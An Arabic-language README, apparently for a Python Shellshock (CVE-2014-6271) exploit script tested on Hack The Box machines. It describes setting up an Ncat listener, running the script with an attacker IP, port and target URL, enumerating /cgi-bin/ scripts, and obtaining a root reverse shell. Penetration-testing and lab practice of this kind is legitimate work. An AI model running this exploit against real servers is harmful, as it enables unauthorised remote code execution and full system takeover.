
استغلال Shellshock المعروف أيضًا باسم CVE-2014-6271
استغلال Shellshock المعروف أيضًا بـ CVE-2014-6271.
تم اختباره على Bash 3.2 و Bash 4.2.
للمزيد من المعلومات حول الثغرة قم بزيارة : https://nvd.nist.gov/vuln/detail/CVE-2014-6271
تم اختبار الاستغلال بشكل أساسي على Hack The Box في الصناديق التالية:
Beep : https://app.hackthebox.eu/machines/BeepShocker : https://app.hackthebox.eu/machines/Shockerخلاف ذلك، إذا حصلت على 403 في دليل /cgi-bin/، فحاول تعداد الملفات
داخل ذلك الدليل باستخدام قائمة كلمات جيدة، بحثًا عن امتدادات .sh أو .cgi.
ملاحظة: لا تنسَ إعداد مستمع TCP الخاص بك، وإلا فقد يعطيك الاستغلال
نتيجة إيجابية خاطئة أثناء فحص استدعاء testRevShell
أولًا، يمكننا رؤية الوسائط التي يأخذها الاستغلال عن طريق تشغيل: shellshock.py -h
ثم يمكننا إعداد مستمع Ncat على منفذ من اختيارنا، وهنا اخترت المنفذ 45
بعد ذلك يمكننا تشغيل الاستغلال عن طريق توفير جميع الوسائط التي يحتاجها عن طريق تشغيل:
shellshock.py [OUR_IP] [OUR_LISTENNING_PORT] [TARGET_URL]
عنوان URL المستهدف هنا، كما ترى، هو المكان الذي يرسل فيه خادم الويب طلب POST أثناء المصادقة على ذلك الصندوق
هنا كما نرى في المخرجات، حاول الاستغلال إرسال الحمولة عبر SSL باستخدام إصدارات متعددة من TLS، حتى نجح
وهنا حصلنا على الصدفة العكسية! ولحسن الحظ، كان خادم الويب يعمل بصلاحيات الجذر.